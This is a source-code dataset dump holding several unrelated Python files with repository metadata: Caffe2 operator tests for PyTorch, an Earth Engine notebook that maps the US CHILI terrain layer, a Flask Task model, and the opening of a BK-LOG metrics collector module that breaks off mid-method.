torch.tensor(scores),
torch.tensor(bbox_deltas),
torch.tensor(im_info),
torch.tensor(anchors),
2.0,
6000,
300,
0.7,
16,
True,
-90,
90,
1.0,
legacy_plus_one=True,
)
torch.testing.assert_allclose(rois, a)
torch.testing.assert_allclose(rois_probs, b)
@given(
bsz=st.integers(1, 5),
seq_lens=st.integers(1, 6),
emb_lens=st.integers(5, 10),
hidden_size=st.integers(3, 7),
num_layers=st.integers(1, 4),
has_biases=st.booleans(),
is_bidirectional=st.booleans(),
batch_first=st.booleans(),
)
def test_inference_lstm(
self,
bsz,
seq_lens,
emb_lens,
hidden_size,
num_layers,
has_biases,
is_bidirectional,
batch_first,
):
num_directions = 2 if is_bidirectional else 1
hx = np.zeros((num_layers * num_directions, bsz, hidden_size), dtype=np.float32)
if batch_first:
inputs = np.random.randn(bsz, seq_lens, emb_lens).astype(np.float32)
else:
inputs = np.random.randn(seq_lens, bsz, emb_lens).astype(np.float32)
torch_lstm = torch.nn.LSTM(
emb_lens,
hidden_size,
batch_first=batch_first,
bidirectional=is_bidirectional,
bias=has_biases,
num_layers=num_layers,
)
def inference_lstm_ref():
input_names = ["inputs", "hidden_0", "hidden_1"]
workspace.FeedBlob("inputs", inputs)
workspace.FeedBlob("hidden_0", hx)
workspace.FeedBlob("hidden_1", hx)
for i, param in enumerate(torch_lstm._flat_weights):
input_names.append("param_{}".format(i))
workspace.FeedBlob("param_{}".format(i), param.detach().numpy())
ref_op = core.CreateOperator(
"InferenceLSTM",
input_names,
["output", "hidden", "cell"],
num_layers=num_layers,
has_biases=has_biases,
batch_first=batch_first,
bidirectional=is_bidirectional,
)
workspace.RunOperatorOnce(ref_op)
return (
workspace.FetchBlob("output"),
workspace.FetchBlob("hidden"),
workspace.FetchBlob("cell")
)
output, hidden, cell = inference_lstm_ref()
output = torch.tensor(output)
hidden = torch.tensor(hidden)
cell = torch.tensor(cell)
lstm_in = [
torch.from_numpy(inputs),
torch.from_numpy(hx),
torch.from_numpy(hx),
] + [param.detach() for param in torch_lstm._flat_weights]
a, b, c = torch.ops._caffe2.InferenceLSTM(
lstm_in, num_layers, has_biases, batch_first, is_bidirectional
)
torch.testing.assert_allclose(output, a)
torch.testing.assert_allclose(hidden, b)
torch.testing.assert_allclose(cell, c)
# Test case is using workspace.has_cuda_support and not workspace.has_gpu_support
# to exclude it from HIP because tensor interop doesn't work for HIP tensors yet
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
@given(
A=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
img_count=st.integers(min_value=3, max_value=3),
)
def test_generate_proposals_cuda(self, A, H, W, img_count):
scores = np.ones((img_count, A, H, W)).astype(np.float32)
bbox_deltas = (
np.linspace(0, 10, num=img_count * 4 * A * H * W)
.reshape((img_count, 4 * A, H, W))
.astype(np.float32)
)
im_info = np.ones((img_count, 3)).astype(np.float32) / 10
anchors = np.ones((A, 4)).astype(np.float32)
def generate_proposals_ref():
ref_op = core.CreateOperator(
"GenerateProposals",
["scores", "bbox_deltas", "im_info", "anchors"],
["rois", "rois_probs"],
spatial_scale=2.0,
)
workspace.FeedBlob("scores", scores)
workspace.FeedBlob("bbox_deltas", bbox_deltas)
workspace.FeedBlob("im_info", im_info)
workspace.FeedBlob("anchors", anchors)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("rois"), workspace.FetchBlob("rois_probs")
rois, rois_probs = generate_proposals_ref()
rois = torch.tensor(rois)
rois_probs = torch.tensor(rois_probs)
a, b = torch.ops._caffe2.GenerateProposals(
torch.tensor(scores).cuda(),
torch.tensor(bbox_deltas).cuda(),
torch.tensor(im_info).cuda(),
torch.tensor(anchors).cuda(),
2.0,
6000,
300,
0.7,
16,
True,
-90,
90,
1.0,
legacy_plus_one=True,
)
torch.testing.assert_allclose(rois, a.cpu())
torch.testing.assert_allclose(rois_probs, b.cpu())
@given(
N=st.integers(min_value=1, max_value=2),
C=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
)
def _test_roi_align(self, N, C, H, W, device):
def rand_roi():
return np.array(
[
float(int(N * np.random.rand())),
0.5 * np.random.rand() * W,
0.5 * np.random.rand() * H,
(0.5 + 0.5 * np.random.rand()) * W,
(0.5 + 0.5 * np.random.rand()) * H,
]
).astype(np.float32)
feature = np.random.randn(N, C, H, W).astype(np.float32)
rois = np.array([rand_roi() for _ in range(10)])
def roi_align_ref(_feature, _rois):
ref_op = core.CreateOperator(
"RoIAlign",
["feature", "rois"],
["roi_feature"],
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
)
workspace.FeedBlob("feature", _feature)
workspace.FeedBlob("rois", _rois)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("roi_feature")
roi_feature_ref = roi_align_ref(feature, rois)
roi_feature = torch.ops._caffe2.RoIAlign(
torch.Tensor(feature).to(device),
torch.Tensor(rois).to(device),
order="NCHW",
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
aligned=False,
)
torch.testing.assert_allclose(roi_feature_ref, roi_feature.cpu())
def test_roi_align_cpu(self):
self._test_roi_align(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_roi_align_cuda(self):
self._test_roi_align(device="cuda")
@given(
N=st.integers(min_value=1, max_value=2),
C=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
)
def _test_roi_align_rotated(self, N, C, H, W, device):
def rand_rotated_roi():
return np.array(
[
float(int(N * np.random.rand())),
np.random.rand() * W,
np.random.rand() * H,
np.random.rand() * W,
np.random.rand() * H,
np.random.rand() * 360 - 180
]
).astype(np.float32)
feature = np.random.randn(N, C, H, W).astype(np.float32)
rois = np.array([rand_rotated_roi() for _ in range(10)])
def roi_align_ref(_feature, _rois):
ref_op = core.CreateOperator(
"RoIAlignRotated",
["feature", "rois"],
["roi_feature"],
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
)
workspace.FeedBlob("feature", _feature)
workspace.FeedBlob("rois", _rois)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("roi_feature")
roi_feature_ref = roi_align_ref(feature, rois)
roi_feature = torch.ops._caffe2.RoIAlignRotated(
torch.Tensor(feature).to(device),
torch.Tensor(rois).to(device),
order="NCHW",
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
aligned=False,
)
torch.testing.assert_allclose(roi_feature_ref, roi_feature.cpu())
def test_roi_align_rotated_cpu(self):
self._test_roi_align_rotated(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_roi_align_rotated_cuda(self):
self._test_roi_align_rotated(device="cuda")
@given(roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10))
def test_collect_and_distribute_fpn_rpn_proposals_op(self, roi_counts):
batch_size = len(roi_counts)
im_dims = np.random.randint(100, 600, batch_size)
rpn_rois_and_scores = []
for i in range(5):
rpn_rois_and_scores.append(torch.Tensor(generate_rois(roi_counts, im_dims)))
for i in range(5):
rpn_rois_and_scores.append(torch.rand(sum(roi_counts)))
rois = torch.ops._caffe2.CollectRpnProposals(
rpn_rois_and_scores,
rpn_max_level=6,
rpn_min_level=2,
rpn_post_nms_topN=sum(roi_counts),
)
fpn_outputs = torch.ops._caffe2.DistributeFpnProposals(
rois,
roi_canonical_scale=224,
roi_canonical_level=4,
roi_max_level=5,
roi_min_level=2,
legacy_plus_one=True,
)
all_outputs = torch.ops._caffe2.CollectAndDistributeFpnRpnProposals(
rpn_rois_and_scores,
roi_canonical_scale=224,
roi_canonical_level=4,
roi_max_level=5,
roi_min_level=2,
rpn_max_level=6,
rpn_min_level=2,
rpn_post_nms_topN=sum(roi_counts),
legacy_plus_one=True,
)
rois_fpn_list = fpn_outputs[:-1]
rois_idx_restore_int32 = fpn_outputs[-1]
# [rois] + fpn_outputs should be equal to all_outputs
torch.testing.assert_allclose(rois, all_outputs[0])
for x, y in zip(fpn_outputs, all_outputs[1:]):
torch.testing.assert_allclose(x, y)
@given(X=hu.tensor(),
fast_gelu=st.booleans())
def _test_gelu_op(self, X, fast_gelu, device):
def _gelu_ref(_X):
return (_X * norm.cdf(_X).astype(np.float32), )
expected_output, = _gelu_ref(X)
actual_output = torch.ops._caffe2.Gelu(torch.tensor(X), fast_gelu)
rtol = 1e-3 if fast_gelu else 1e-4
atol = 1e-5
torch.testing.assert_allclose(
expected_output, actual_output.cpu(), rtol=rtol, atol=atol)
def test_gelu_op(self):
self._test_gelu_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_gelu_op_cuda(self):
self._test_gelu_op(device="cuda")
@given(inputs=hu.lengths_tensor(
dtype=np.float32,
min_value=1,
max_value=5,
allow_empty=True,
))
def _test_lengths_op(self, inputs, ref_op_name, torch_op, device):
data, lengths = inputs
def _lengths_ref(X, Y):
ref_op = core.CreateOperator(ref_op_name, ["X", "Y"], "out")
workspace.FeedBlob("X", X)
workspace.FeedBlob("Y", Y)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("out")
expected_output = _lengths_ref(data, lengths)
actual_output = torch_op(
torch.tensor(data), torch.tensor(lengths, dtype=torch.int32))
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def _test_lengths_sum_op(self, device):
self._test_lengths_op("LengthsSum", torch.ops._caffe2.LengthsSum, device)
def test_lengths_sum_op(self):
self._test_lengths_sum_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_sum_op_cuda(self):
self._test_lengths_sum_op(device="cuda")
def _test_lengths_mean_op(self, device):
self._test_lengths_op("LengthsMean", torch.ops._caffe2.LengthsMean, device)
def test_lengths_mean_op(self):
self._test_lengths_mean_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_mean_op_cuda(self):
self._test_lengths_mean_op(device="cuda")
def _test_lengths_max_op(self, device):
self._test_lengths_op("LengthsMax", torch.ops._caffe2.LengthsMax, device)
def test_lengths_max_op(self):
self._test_lengths_max_op(device="cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_lengths_max_op_cuda(self):
self._test_lengths_max_op(device="cuda")
def _test_resize_nearest_op(self, device):
data = np.random.rand(1, 2, 3, 4).astype(np.float32)
def _resize_nearest_ref(X):
ref_op = core.CreateOperator(
"ResizeNearest", ["X"], ["Y"],
width_scale=2.0, height_scale=1.5, order="NCHW",
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _resize_nearest_ref(data)
actual_output = torch.ops._caffe2.ResizeNearest(
torch.tensor(data).to(device),
order="NCHW", width_scale=2.0, height_scale=1.5,
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_resize_nearest_op_cpu(self):
return self._test_resize_nearest_op("cpu")
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_resize_nearest_op_cuda(self):
return self._test_resize_nearest_op("cuda")
@given(input_data=hu.tensor(min_dim=2, max_dim=2))
def test_Fused8BitRowwiseQuantizedToFloat(self, input_data):
QuantizeOp = core.CreateOperator(
"FloatToFused8BitRowwiseQuantized",
["input_data"],
["quantized_data"],
)
workspace.FeedBlob("input_data", input_data)
workspace.RunOperatorOnce(QuantizeOp)
quantized_data = workspace.FetchBlob("quantized_data")
dequantized_data = torch.ops._caffe2.Fused8BitRowwiseQuantizedToFloat(
torch.tensor(quantized_data)
)
reference = fused_rowwise_8bit_quantize_dequantize_reference(input_data)
np.testing.assert_array_almost_equal(dequantized_data.numpy(), reference)
@given(binary_input=st.booleans())
def test_piecewise_linear_op(self, binary_input):
if binary_input:
num_dims = 1
else:
num_dims = 3
data = np.random.rand(1024, num_dims).astype(np.float32)
slopes = np.zeros(4 * num_dims).astype(np.float32)
bounds = np.sort(np.random.rand(5, num_dims).astype(np.float32), axis=0).flatten('F')
intercepts = np.random.rand(4 * num_dims).astype(np.float32)
def _piecewise_linear_ref(X):
ref_op = core.CreateOperator(
"PiecewiseLinearTransform",
["data",
"bounds",
"slopes",
"intercepts"],
["calibrated"],
binary=binary_input,
)
workspace.FeedBlob("data", X)
workspace.FeedBlob("bounds", bounds)
workspace.FeedBlob("slopes", slopes)
workspace.FeedBlob("intercepts", intercepts)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("calibrated")
expected_output = _piecewise_linear_ref(data)
actual_output = torch.ops._caffe2.PiecewiseLinearTransform(
torch.tensor(data), bounds.tolist(), slopes.tolist(), intercepts.tolist(), binary_input)
torch.testing.assert_allclose(torch.tensor(expected_output), actual_output)
def test_alias_with_name_is_in_place(self):
device = "cuda" if workspace.has_cuda_support else "cpu"
x = torch.Tensor([3, 42]).to(device)
y = torch.ops._caffe2.AliasWithName(x, "new_name")
x[1] = 6
torch.testing.assert_allclose(x, torch.Tensor([3, 6]).to(device))
# y should also change because y is alias of x
torch.testing.assert_allclose(y, torch.Tensor([3, 6]).to(device))
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
def test_copy_between_cpu_and_gpu(self):
x_cpu_ref = torch.Tensor([1, 2, 3])
x_gpu_ref = x_cpu_ref.to("cuda")
x_gpu = torch.ops._caffe2.CopyCPUToGPU(x_cpu_ref)
torch.testing.assert_allclose(x_gpu, x_gpu_ref)
x_cpu = torch.ops._caffe2.CopyGPUToCPU(x_gpu)
torch.testing.assert_allclose(x_cpu, x_cpu_ref)
def test_index_hash_op(self):
data = np.random.randint(low=0, high=1000, size=(4, 4, 4))
def _index_hash_ref(X):
ref_op = core.CreateOperator(
"IndexHash", ["X"], ["Y"], seed=0, modulo=100
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _index_hash_ref(data)
actual_output = torch.ops._caffe2.IndexHash(
torch.tensor(data), seed=0, modulo=100
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_bucketize_op(self):
data = np.random.rand(8, 10).astype(np.float32) * 1000
boundaries = np.array([1, 10, 100, 1000, 100000]).astype(np.float32)
def _bucketize_ref(X):
ref_op = core.CreateOperator(
"Bucketize", ["X"], ["Y"], boundaries=boundaries
)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _bucketize_ref(data)
actual_output = torch.ops._caffe2.Bucketize(
torch.tensor(data), boundaries
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
@given(X=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
)
def test_logit(self, X, eps):
def ref(X, eps):
ref_op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
workspace.FeedBlob("X", X)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = ref(X, eps)
actual_output = torch.ops._caffe2.Logit(
torch.tensor(X), eps
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_percentile(self):
original_values = np.array([[3., 5., 3], [5., 1., 6.]]).astype(np.float32)
value_to_pct = np.array([[3, 0.2], [5, 0.5], [1, 0.3], [3, 0.6]]).astype(np.float32)
lengths = np.array([2, 1, 1]).astype(np.int32)
def _percentile_ref(original_values, value_to_pct, lengths):
ref_op = core.CreateOperator('Percentile', ["original_values", "value_to_pct", "lengths"], ["Y"])
workspace.FeedBlob("original_values", original_values)
workspace.FeedBlob("value_to_pct", value_to_pct)
workspace.FeedBlob("lengths", lengths)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _percentile_ref(original_values, value_to_pct, lengths)
actual_output = torch.ops._caffe2.Percentile(
torch.tensor(original_values), torch.Tensor(value_to_pct), torch.Tensor(lengths).int()
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_batch_bucket_one_hot_op(self):
data = np.array([[2, 3], [4, 1], [2, 5]]).astype(np.float32)
lengths = np.array([2, 3]).astype(np.int32)
boundaries = np.array([0.1, 2.5, 1, 3.1, 4.5]).astype(np.float32)
def _batch_bucket_one_hot_ref(data, lengths, boundaries):
ref_op = core.CreateOperator('BatchBucketOneHot', ["data", "lengths", "boundaries"], ["Y"])
workspace.FeedBlob("data", data)
workspace.FeedBlob("lengths", lengths)
workspace.FeedBlob("boundaries", boundaries)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("Y")
expected_output = _batch_bucket_one_hot_ref(data, lengths, boundaries)
actual_output = torch.ops._caffe2.BatchBucketOneHot(
torch.tensor(data), torch.Tensor(lengths).int(), torch.Tensor(boundaries)
)
torch.testing.assert_allclose(expected_output, actual_output.cpu())
def test_gather_ranges_to_dense_op(self):
data = np.array([1, 2, 3, 4, 5, 6, 7, 8])
ranges = np.array([[[2, 4]], [[0, 0]]])
key = np.array([0, 1, 3, 2, 1, 0, 1, 0])
lengths = np.array([4])
min_observation = 2
max_mismatched_ratio = 0.5
max_empty_ratio = 1.0
outputs_name = ["X_{}".format(i) for i in range(len(lengths))]
ref_op = core.CreateOperator(
"GatherRangesToDense",
["data", "ranges", "key"],
outputs_name,
lengths=lengths,
min_observation=min_observation,
max_mismatched_ratio=max_mismatched_ratio,
max_empty_ratio=max_empty_ratio,
)
workspace.FeedBlob("data", data)
workspace.FeedBlob("ranges", ranges)
workspace.FeedBlob("key", key)
workspace.RunOperatorOnce(ref_op)
ref_outputs = []
for output_name in outputs_name:
ref_outputs.append(workspace.FetchBlob(output_name))
outputs = torch.ops._caffe2.GatherRangesToDense(
torch.from_numpy(data),
torch.from_numpy(ranges),
torch.from_numpy(key),
lengths=lengths,
min_observation=min_observation,
max_mismatched_ratio=max_mismatched_ratio,
max_empty_ratio=max_empty_ratio,
)
self.assertEqual(len(ref_outputs), len(outputs))
for i in range(0, len(ref_outputs)):
np.testing.assert_array_almost_equal(ref_outputs[i], outputs[i].numpy())
@given(lengths_0=st.integers(1, 10), lengths_1=st.integers(1, 10))
@settings(deadline=1000)
def test_merge_id_lists(self, lengths_0, lengths_1):
def _merge_id_lists(lengths, values):
ref_op = core.CreateOperator(
'MergeIdLists',
["lengths_0", "values_0", "lengths_1", "values_1"],
["merged_lengths", "merged_values"]
)
workspace.FeedBlob("lengths_0", lengths[0])
workspace.FeedBlob("values_0", values[0])
workspace.FeedBlob("lengths_1", lengths[1])
workspace.FeedBlob("values_1", values[1])
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("merged_lengths"), workspace.FetchBlob("merged_values")
lengths = [np.array([lengths_0]).astype(np.int32), np.array([lengths_1]).astype(np.int32)]
values = [
np.random.choice(np.arange(0, 10), size=lengths_0, replace=False).astype(np.int32),
np.random.choice(np.arange(10, 20), size=lengths_1, replace=False).astype(np.int32)
]
expected_merged_lengths, expected_merged_values = _merge_id_lists(lengths, values)
output_merged_lengths, output_merged_values = torch.ops._caffe2.MergeIdLists(
[torch.tensor(lengths[0]), torch.tensor(values[0]), torch.tensor(lengths[1]), torch.tensor(values[1])]
)
torch.testing.assert_allclose(expected_merged_lengths, output_merged_lengths)
torch.testing.assert_allclose(expected_merged_values, output_merged_values)
def test_learning_rate(self):
base_lr = 0.05
no_iter = torch.tensor([0])
one_iter = torch.tensor([1])
two_iter = torch.tensor([2])
# Fixed policy
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=no_iter, base_lr=base_lr, policy="fixed"
),
)
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=one_iter, base_lr=base_lr, policy="fixed"
),
)
# Step policy
gamma = 0.99
stepsize = 1
self.assertEqual(
base_lr,
torch.ops._caffe2.LearningRate(
iterations=no_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
self.assertAlmostEqual(
base_lr * (gamma ** (1.0 / stepsize)),
torch.ops._caffe2.LearningRate(
iterations=one_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
self.assertAlmostEqual(
base_lr * (gamma ** (2.0 / stepsize)),
torch.ops._caffe2.LearningRate(
iterations=two_iter,
base_lr=base_lr,
policy="step",
stepsize=stepsize,
gamma=gamma,
),
)
def test_pack_segments(self):
s = torch.rand(3, 3, 3)
lengths = torch.tensor([2, 1])
packed_tensor, _ = torch.ops._caffe2.PackSegments(
lengths,
s,
)
self.assertEqual(packed_tensor.numpy().shape, (2, 2, 3, 3))
unpacked_tensor = torch.ops._caffe2.UnpackSegments(
lengths,
packed_tensor,
)
torch.testing.assert_allclose(s, unpacked_tensor)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
1c47c9fdf8a8c8a97a85e511d2f728033d298a81 | b4c6200590a093b805036a822b7889c058494b9f | /Datasets/Terrain/us_ned_chili.py | 8d66c58338f961fef2e597316c2d216fac9c958f | [
"MIT"
] | permissive | spoddar-JNPR/earthengine-py-notebooks | 2109a52a49357c19f803b76ed635e022ee486ac6 | ff1b5754785d5e25cb11acdbd52b0f31711d061f | refs/heads/master | 2022-12-25T10:34:44.895717 | 2020-10-01T05:38:16 | 2020-10-01T05:38:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,897 | py | # %%
"""
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Datasets/Terrain/us_ned_chili.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Datasets/Terrain/us_ned_chili.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Datasets/Terrain/us_ned_chili.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
"""
# %%
"""
## Install Earth Engine API and geemap
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geemap](https://github.com/giswqs/geemap). The **geemap** Python package is built upon the [ipyleaflet](https://github.com/jupyter-widgets/ipyleaflet) and [folium](https://github.com/python-visualization/folium) packages and implements several methods for interacting with Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, and `Map.centerObject()`.
The following script checks if the geemap package has been installed. If not, it will install geemap, which automatically installs its [dependencies](https://github.com/giswqs/geemap#dependencies), including earthengine-api, folium, and ipyleaflet.
**Important note**: A key difference between folium and ipyleaflet is that ipyleaflet is built upon ipywidgets and allows bidirectional communication between the front-end and the backend enabling the use of the map to capture user input, while folium is meant for displaying static data only ([source](https://blog.jupyter.org/interactive-gis-in-jupyter-with-ipyleaflet-52f9657fa7a)). Note that [Google Colab](https://colab.research.google.com/) currently does not support ipyleaflet ([source](https://github.com/googlecolab/colabtools/issues/60#issuecomment-596225619)). Therefore, if you are using geemap with Google Colab, you should use [`import geemap.eefolium`](https://github.com/giswqs/geemap/blob/master/geemap/eefolium.py). If you are using geemap with [binder](https://mybinder.org/) or a local Jupyter notebook server, you can use [`import geemap`](https://github.com/giswqs/geemap/blob/master/geemap/geemap.py), which provides more functionalities for capturing user input (e.g., mouse-clicking and moving).
"""
# %%
# Installs geemap package
import subprocess
try:
import geemap
except ImportError:
print('geemap package not installed. Installing ...')
subprocess.check_call(["python", '-m', 'pip', 'install', 'geemap'])
# Checks whether this notebook is running on Google Colab
try:
import google.colab
import geemap.eefolium as geemap
except:
import geemap
# Authenticates and initializes Earth Engine
import ee
try:
ee.Initialize()
except Exception as e:
ee.Authenticate()
ee.Initialize()
# %%
"""
## Create an interactive map
The default basemap is `Google Maps`. [Additional basemaps](https://github.com/giswqs/geemap/blob/master/geemap/basemaps.py) can be added using the `Map.add_basemap()` function.
"""
# %%
Map = geemap.Map(center=[40,-100], zoom=4)
Map
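# %%
"""
Illustrative extra cell (a sketch, not part of the original notebook): the markdown
cell above mentions `Map.add_basemap()`. Assuming 'HYBRID' is among the basemap keys
bundled with geemap, an additional basemap layer can be added like this.
"""
# %%
Map.add_basemap('HYBRID')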
# %%
"""
## Add Earth Engine Python script
"""
# %%
# Add Earth Engine dataset
dataset = ee.Image('CSP/ERGo/1_0/US/CHILI')
usChili = dataset.select('constant')
usChiliVis = {
'min': 0.0,
'max': 255.0,
}
Map.setCenter(-105.8636, 40.3439, 11)
Map.addLayer(usChili, usChiliVis, 'US CHILI')
# %%
"""
## Display Earth Engine data layers
"""
# %%
Map.addLayerControl() # This line is not needed for ipyleaflet-based Map.
Map | [
"[email protected]"
] | |
4d9e7f2b00593771459ae1d452b172e575e963f1 | 4a2c9299dfd009a614934ee82910adaa17ff3186 | /app/tasks/models.py | 75bc9c44588e8100eca8370379fc0d70e88d4cfe | [
"MIT"
] | permissive | sampathweb/blueprint_app | be8ab9c5bd956bc393b61542158c325ad27fffed | 149225db4291519a6de56d8930e3a36ff9cd7888 | refs/heads/master | 2016-09-06T08:30:25.918934 | 2013-10-24T22:48:52 | 2013-10-24T22:48:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | from datetime import datetime
from app import db
class Task(db.Model):
"""A Task list."""
__tablename__ = 'tasks'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50), unique=True, nullable=False)
description = db.Column(db.String(255))
active = db.Column(db.Boolean, default=True)
| [
"[email protected]"
] | |
3228263fc72105b309bff70782b154f4301ebf3d | 457286f32a360c36da04f47fc4e7456dc07ee1df | /apps/log_measure/handlers/metrics.py | d51099943bd9c36c0f3352117243835c1e7264b5 | [
"MIT"
] | permissive | jiazhizhong/bk-log | 2fad422022f02569acf6e8668bb548cb76fcd8ca | 85107762102ba2c72dcfb30fcf8986e146c03889 | refs/heads/master | 2023-08-21T02:01:08.911894 | 2021-10-22T08:52:22 | 2021-10-22T08:52:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,051 | py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from __future__ import absolute_import, unicode_literals
import socket
import time
from collections import defaultdict
from functools import wraps
import arrow
from django.contrib.auth import get_user_model
from django.core.cache import cache
from django.db.models import Count
from django.utils.translation import ugettext as _
from elasticsearch import Elasticsearch
from apps.api import TransferApi, NodeApi, CCApi
from apps.utils.log import logger
from apps.log_databus.constants import STORAGE_CLUSTER_TYPE
from apps.log_databus.models import CollectorConfig
from apps.log_measure.exceptions import EsConnectFailException
from apps.log_search.models import UserIndexSetSearchHistory, LogIndexSet, ProjectInfo
from bk_dataview.grafana import client as grafana_client
class Metric(object):
"""
    Metric definition.
"""
def __init__(self, metric_name, metric_value, dimensions=None):
self.metric_name = metric_name
self.metric_value = metric_value
self.dimensions = dimensions
def to_prometheus_text(self, namespace=None, timestamp=""):
if namespace:
actual_metric_name = "{}_{}".format(namespace, self.metric_name)
else:
actual_metric_name = self.metric_name
if self.dimensions:
dimensions = ",".join('{}="{}"'.format(key, value) for key, value in self.dimensions.items())
dimensions = "{" + dimensions + "}"
else:
dimensions = ""
prometheus_text = "{metric_name}{dimensions} {metric_value} {timestamp}".format(
metric_name=actual_metric_name,
dimensions=dimensions,
metric_value=self.metric_value,
timestamp=timestamp * 1000,
)
return prometheus_text
def register_metric(namespace, description="", cache_time=0):
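    # Descriptive note: this decorator tags a collector method as a metric group
    # (namespace/description/is_metric) and, when cache_time is set, caches its
    # result in the Django cache under the key "statistics_<namespace>".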
def wrapped_view(func):
def _wrapped_view(*args, **kwargs):
cache_key = f"statistics_{namespace}"
if cache_time:
result = cache.get(cache_key)
if result:
return result
result = func(*args, **kwargs)
if cache_time:
cache.set(cache_key, result, cache_time)
return result
_wrapped_view.namespace = namespace
_wrapped_view.description = description
_wrapped_view.is_metric = True
return wraps(func)(_wrapped_view)
return wrapped_view
class BaseMetricCollector(object):
def __init__(self, collect_interval=300):
        # Business info cache
biz_list = CCApi.get_app_list({"fields": ["bk_biz_id", "bk_biz_name"], "no_request": True}).get("info", [])
self.biz_info = {int(business["bk_biz_id"]): business for business in biz_list}
self.project_biz_info = {}
for project in ProjectInfo.objects.all():
self.project_biz_info[project.project_id] = self.biz_info.get(project.bk_biz_id)
        # Reporting timestamp
self.collect_interval = collect_interval
timestamp = arrow.now().timestamp
self.report_ts = timestamp // self.collect_interval * self.collect_interval
@property
def time_range(self):
        # Round down to the collection interval
